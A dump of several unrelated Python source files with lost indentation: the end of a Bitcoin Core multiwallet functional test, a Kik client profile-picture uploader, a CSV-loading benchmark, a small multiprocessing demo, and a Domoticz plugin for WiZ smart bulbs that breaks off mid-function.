# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
self.generatetoaddress(node, nblocks=1, address=w5.getnewaddress(), sync_fun=self.no_op)
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = f"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
self.generatetoaddress(node, nblocks=1, address=wallets[0].getnewaddress(), sync_fun=self.no_op)
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
self.generatetoaddress(node, nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
self.generatetoaddress(node, nblocks=1, address=w1.getnewaddress(), sync_fun=self.no_op)
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, f"Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Unload w1 again, this time providing the wallet name twice
self.nodes[0].loadwallet("w1")
assert 'w1' in self.nodes[0].listwallets()
w1.unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
profile_pictures.py | import logging
import os
from threading import Thread
import requests
from kik_unofficial.device_configuration import kik_version_info
from kik_unofficial.datatypes.exceptions import KikApiException, KikUploadError
from kik_unofficial.utilities.cryptographic_utilities import CryptographicUtils
from kik_unofficial.utilities.parsing_utilities import get_file_bytes
log = logging.getLogger('kik_unofficial')
def set_profile_picture(file, jid, username, password):
url = 'https://profilepicsup.kik.com/profilepics'
send(url, file, jid, username, password)
def set_background_picture(file, jid, username, password):
url = 'https://profilepicsup.kik.com/profilepics?extension_type=BACKGROUND'
send(url, file, jid, username, password)
def send(url, filename, jid, username, password):
password_key = CryptographicUtils.key_from_password(username, password)
if not os.path.isfile(filename):
raise KikApiException("File doesn't exist")
headers = {
'x-kik-jid': jid,
'x-kik-password': password_key,
'User-Agent': f'Kik/{kik_version_info["kik_version"]} (Android 7.1.2) Dalvik/2.1.0 (Linux; U; Android 7.1.2; Nexus 7 Build/NJH47F)',
}
Thread(target=picture_upload_thread, args=(url, filename, headers), name='KikProfilepics').start()
def picture_upload_thread(url, filename, headers):
picture_data = get_file_bytes(filename)
log.debug('Uploading picture')
r = requests.post(url, data=picture_data, headers=headers)
if r.status_code != 200:
raise KikUploadError(r.status_code, r.reason)
|
bmkit_load_csv_mp.py | import pandas as pd
import csv
from progressivis import Scheduler
from progressivis.io import CSVLoader
from progressivis.table.constant import Constant
from progressivis.table.table import Table
from progressivis.datasets import get_dataset
from benchmarkit import BenchMarkIt
import sys
import os
import os.path
import subprocess
import glob
import gc
import sqlite3
from collections import OrderedDict
from multiprocessing import Process
import dask.dataframe as dd
def p10s_read_csv(f):
s=Scheduler()
module=CSVLoader(f, index_col=False, header=None, scheduler=s)
s.start()
def none_read_csv(f):
res = {}
with open(f, 'rb') as csvfile:
for _ in csvfile:
pass
def naive_read_csv(f):
res = {}
with open(f, 'rb') as csvfile:
reader = csv.reader(csvfile, delimiter=',')
first = next(reader)
for i, cell in enumerate(first):
res[i] = [float(cell)]
for row in reader:
for i, cell in enumerate(row):
res[i].append(float(cell))
return res
def dask_read_csv(f):
dd.read_csv(f).compute()
def cleanup_hdf5():
for d in glob.glob('/tmp/progressivis_*'):
subprocess.call(['/bin/rm','-rf', d])
func_dict = OrderedDict([("Empty", none_read_csv), ("Pandas",pd.read_csv),("Dask", dask_read_csv),
("Progressivis", p10s_read_csv), ("Naive", naive_read_csv)])
def bmkit_worker(csv_file, db_name, label, mode, nb_lines):
func = func_dict[label]
mem_flag = True if mode=='mem' else False
time_flag = True if mode=='time' else False
bm = BenchMarkIt(func, [csv_file], label=label)
bm.run(tm=time_flag, mem=mem_flag)
d = bm.to_dict()
print(d)
conn = sqlite3.connect(db_name)
c = conn.cursor()
if mem_flag:
c.execute("UPDATE {}_tbl SET memory=? WHERE mega_lines=?".format(
label.lower()), (d['memory'], nb_lines,))
if time_flag:
c.execute('''UPDATE {}_tbl SET elapsed_time=?,
sys_time=?, user_time=? WHERE mega_lines=?'''.format(
label.lower()), (d['elapsed_time'], d['sys_time'], d['user_time'], nb_lines,))
conn.commit()
conn.close()
cleanup_hdf5()
if __name__=='__main__':
if len(sys.argv) < 3:
print("Usage {} <dbname> <csvfile1> [<csvfile2>...<csvfileN>]".format(sys.argv[0]))
sys.exit()
db_name = sys.argv[1]
labels = func_dict.keys() #["Empty", "Pandas", "Progressivis", "Naive"]
low_labels = [e.lower() for e in labels]
if os.path.exists(db_name):
print("Database {} already exists, exit".format(db_name))
sys.exit()
conn = sqlite3.connect(db_name)
c = conn.cursor()
for llab in low_labels:
c.execute('''CREATE TABLE {}_tbl
(mega_lines integer, memory real, elapsed_time real,
sys_time real, user_time real)'''.format(llab))
csv_file_dict = {}
for csv_file in sys.argv[2:]:
nb_lines, _ = subprocess.check_output(['wc','-l', csv_file]).split(' ')
nb_mega = int(nb_lines)//1000000
csv_file_dict[csv_file] = nb_mega
for llab in low_labels:
c.execute("INSERT INTO {}_tbl VALUES(?, ?, ?, ?, ?)".format(llab),
(nb_mega,
None, None, None, None))
conn.commit()
conn.close()
for csv_file in sys.argv[2:]:
for lab in labels:
p = Process(target=bmkit_worker, args=(csv_file, db_name, lab, 'time', csv_file_dict[csv_file]))
p.start()
p.join()
p = Process(target=bmkit_worker, args=(csv_file, db_name, lab, 'mem', csv_file_dict[csv_file]))
p.start()
p.join()
|
tsetmp.py | __about__="Multiprocessing Example"
import multiprocessing
def calc_squares(n):
for x in n:
print("Square of:"+str(x)+":is:",x*x)
def calc_cube(n):
for y in n:
print("Cubes of:"+str(y)+":is:",y*y*y)
if __name__=='__main__':
arr = [1,2,3,4,5,6,7]
p1 = multiprocessing.Process(target=calc_squares, args=(arr,))
p2 = multiprocessing.Process(target=calc_cube, args=(arr,))
p1.start()
p2.start()
p1.join()
p2.join() |
plugin.py | # Domoticz WiZ connected Plugin
#
# Author: Syds Post sydspost@gmail.com
# Color bulbs support & UDP discovery by Faust93 monumentum@gmail.com
#
"""
<plugin key="wiz" name="WiZ connected" author="Syds Post" version="1.0.0" wikilink="" externallink="https://www.wizconnected.com/">
<description>
<h2>WiZ connected Plugin</h2><br/>
This plugin is meant to control WiZ connected devices. WiZ connected devices may come with different brands as Philips, TAO and WiZ connected etc.
<h3>Features</h3>
<ul style="list-style-type:square">
<li>Auto-detection of devices on network</li>
<li>On/Off control, state and available status display</li>
<li>RGBWW & Dimmer/Warm-cold setting for Lights</li>
<!-- <li>Scene activation support</li> -->
</ul>
<h3>Devices</h3>
<ul style="list-style-type:square">
<li>All devices that have on/off state should be supported</li>
</ul>
<h3>Configuration</h3>
Devices can be renamed in Domoticz or you can rename them in the App and remove them from Domoticz so they are detected with a new name or layout.
</description>
<params>
<param field="Mode1" label="Broadcast Space" width="200px" required="true" default="192.168.1.255"/>
<param field="Mode6" label="Debug" width="150px">
<options>
<option label="None" value="0" default="true" />
<option label="Python Only" value="2"/>
<option label="Basic Debugging" value="62"/>
<option label="Basic+Messages" value="126"/>
<option label="Connections Only" value="16"/>
<option label="Connections+Python" value="18"/>
<option label="Connections+Queue" value="144"/>
<option label="All" value="-1"/>
</options>
</param>
</params>
</plugin>
"""
import Domoticz
import threading
import socket
import html
import sys
import time
import math
import json
import re
import asyncio
#from scapy.all import srp,Ether,ARP,conf
from pywizlight import wizlight, PilotBuilder, discovery
class BasePlugin:
startup = True;
devs = {}
last_update = 0
loop = None
def __init__(self):
return
async def discovery(self, init = True):
bulbs = await discovery.discover_lights(broadcast_space=Parameters["Mode1"])
if init != True:
return bulbs
for bulb in bulbs:
bulb_type = await bulb.get_bulbtype()
deviceFound = False
for Device in Devices:
if ((bulb.ip == Devices[Device].DeviceID)): deviceFound = True
if (deviceFound == False):
if bulb_type.features.color:
Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=4, Switchtype=7, Image=0).Create()
else:
Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=8, Switchtype=7, Image=0).Create()
def onStart(self):
Domoticz.Log("WiZ connected plugin started")
if Parameters["Mode6"] != "0":
Domoticz.Debugging(int(Parameters["Mode6"]))
DumpConfigToLog()
self.loop = asyncio.get_event_loop()
self.loop.run_until_complete(self.discovery())
# Create/Start update thread
self.updateThread = threading.Thread(name="WiZUpdateThread", target=BasePlugin.handleThread, args=(self,))
self.updateThread.start()
def onStop(self):
Domoticz.Debug("onStop called")
while (threading.active_count() > 1):
time.sleep(1.0)
def onConnect(self, Connection, Status, Description):
Domoticz.Debug("onConnect called")
def onMessage(self, Connection, Data):
Domoticz.Debug("onMessage called")
def onCommand(self, Unit, Command, Level, Color):
Domoticz.Debug("onCommand called for Unit " + str(Unit) + ": Parameter '" + str(Command) + "', Level: " + str(Level))
# Find the device for the Domoticz Unit provided
dev = None
try:
dev = Devices[Unit]
except Exception as e:
Domoticz.Debug("Device has no ID " + str(Unit) + " " + str(e))
# If we didn't find it, leave (probably disconnected at this time)
if dev == None:
Domoticz.Error('Command for DeviceID='+Devices[Unit].DeviceID+' but device is not available.')
return
# if not dev.available():
# Domoticz.Error('Command for DeviceID='+Devices[Unit].DeviceID+' but device is offline.')
# return
Domoticz.Log('Sending command for DeviceID='+Devices[Unit].DeviceID)
host = str(Devices[Unit].DeviceID)
port = 38899
# Control device and update status in Domoticz
if Command == 'On':
mJSON = b'{"method":"setPilot","params":{"src":"udp","state":true}}'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(mJSON, (host, port))
received = sock.recv(1024).decode('utf-8')
finally:
sock.close()
received=str(received).split(",")[2].split(":")[2]
received=received[0:len(received)-3].capitalize()
UpdateDevice(Unit, 1, 'On', not received)
elif Command == 'Off':
mJSON = b'{"method":"setPilot","params":{"src":"udp","state":false}}'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(mJSON, (host, port))
received = sock.recv(1024).decode('utf-8')
finally:
sock.close()
received=str(received).split(",")[2].split(":")[2]
received=received[0:len(received)-3].capitalize()
UpdateDevice(Unit, 0, 'Off', not received)
elif Command == 'Set Color':
# Convert RGB to Cold- and White level
rgb = json.loads(Color)
mode = rgb.get("m")
r = rgb.get("r")
g = rgb.get("g")
b = rgb.get("b")
cw = rgb.get("cw")
ww = rgb.get("ww")
if Devices[Unit].SubType == 8:
mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + ',"c":' + str(cw) + ',"w":' + str(ww) + '}}', 'utf-8')
else:
mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + ',"r":' + str(r) + ',"g":' + str(g) + ',"b":' + str(b) + ',"c":' + str(cw) + ',"w":' + str(ww) + '}}', 'utf-8')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(mJSON, (host, port))
received = sock.recv(1024).decode('utf-8')
finally:
sock.close()
received=str(received).split(",")[2].split(":")[2]
received=received[0:len(received)-3].capitalize()
# Update status of Domoticz device
Devices[Unit].Update(nValue=1, sValue=str(Level), TimedOut=not received, Color=Color)
elif Command == 'Set Level':
# Set new level
mJSON = bytes('{"method":"setPilot","params":{"src":"udp","state":true,"dimming":' + str(Level) + '}}', 'utf-8')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(mJSON, (host, port))
received = sock.recv(1024).decode('utf-8')
finally:
sock.close()
received=str(received).split(",")[2].split(":")[2]
received=received[0:len(received)-3].capitalize()
# Update status of Domoticz device
UpdateDevice(Unit, 1 if Devices[Unit].Type == 241 else 2, str(Level), not received)
# Set last update
self.last_update = time.time()
def onNotification(self, Name, Subject, Text, Status, Priority, Sound, ImageFile):
Domoticz.Debug("Notification: " + Name + "," + Subject + "," + Text + "," + Status + "," + str(Priority) + "," + Sound + "," + ImageFile)
def onDisconnect(self, Connection):
Domoticz.Debug("onDisconnect called")
def onHeartbeat(self):
Domoticz.Debug("onHeartbeat called time="+str(time.time()))
# If it hasn't been at least 1 minute (corrected for ~2s runtime) since last update, skip it
if time.time() - self.last_update < 58:
return
# Create/Start update thread
self.updateThread = threading.Thread(name="WiZUpdateThread", target=BasePlugin.handleThread, args=(self,))
self.updateThread.start()
# Separate thread looping ever 10 seconds searching for new WiZ connected devices on network and updating their status
def handleThread(self):
try:
Domoticz.Debug("in handlethread")
# Initialize/Update WiZ devices
# Set last update
self.last_update = time.time()
# Update devices
bulbs = self.loop.run_until_complete(self.discovery(False))
for bulb in bulbs:
bulb_type = asyncio.run(bulb.get_bulbtype())
Domoticz.Debug("Endpoint '"+bulb.ip+"' found.")
deviceFound = False
for Device in Devices:
if ((bulb.ip == Devices[Device].DeviceID)): deviceFound = True
host = str(Devices[Device].DeviceID)
port = 38899
mJSON = b'{"method":"getPilot"}'
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sock.sendto(mJSON, (host, port))
received = sock.recv(1024).decode('utf-8')
finally:
sock.close()
received=json.loads(received)
wizstate=received["result"]["state"]
if wizstate:
wizstate = 1
else:
wizstate = 0
wizlevel=str(received["result"]["dimming"])
if Devices[Device].Color != "":
c=json.loads(Devices[Device].Color)
if 'c' in received["result"] and 'w' in received["result"]:
c["cw"] = wizcw=received["result"]["c"]
c["ww"] = wizww=received["result"]["w"]
if 'r' in received["result"] and 'g' in received["result"] and 'b' in received["result"]:
c["r"] = received["result"]["r"]
c["g"] = received["result"]["g"]
c["b"] = received["result"]["b"]
if 'temp' in received["result"]:
wiztemp=received["result"]["temp"]
c["t"] = (wiztemp - 2700) / 14.9
wizcolor=json.dumps(c)
else:
wizcolor=""
# Update status of Domoticz device
Devices[Device].Update(nValue=wizstate, sValue=wizlevel, TimedOut=False, Color=wizcolor)
if (deviceFound == False):
if bulb_type.features.color:
Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=4, Switchtype=7, Image=0).Create()
else:
Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=8, Switchtype=7, Image=0).Create()
except Exception as err:
Domoticz.Error("handleThread: "+str(err)+' line '+format(sys.exc_info()[-1].tb_lineno))
global _plugin
_plugin = BasePlugin()
def onStart():
global _plugin
_plugin.onStart()
def onStop():
global _plugin
_plugin.onStop()
def onConnect(Connection, Status, Description):
global _plugin
_plugin.onConnect(Connection, Status, Description)
def onMessage(Connection, Data):
global _plugin
_plugin.onMessage(Connection, Data)
def onCommand(Unit, Command, Level, Color):
global _plugin
_plugin.onCommand(Unit, Command, Level, Color)
def onNotification(Name, Subject, Text, Status, Priority, Sound, ImageFile):
global _plugin
_plugin.onNotification(Name, Subject, Text, Status, Priority, Sound, ImageFile)
def onDisconnect(Connection):
global _plugin
_plugin.onDisconnect(Connection)
def onHeartbeat():
global _plugin
_plugin.onHeartbeat()
# Generic helper functions
def DumpConfigToLog():
for x in Parameters:
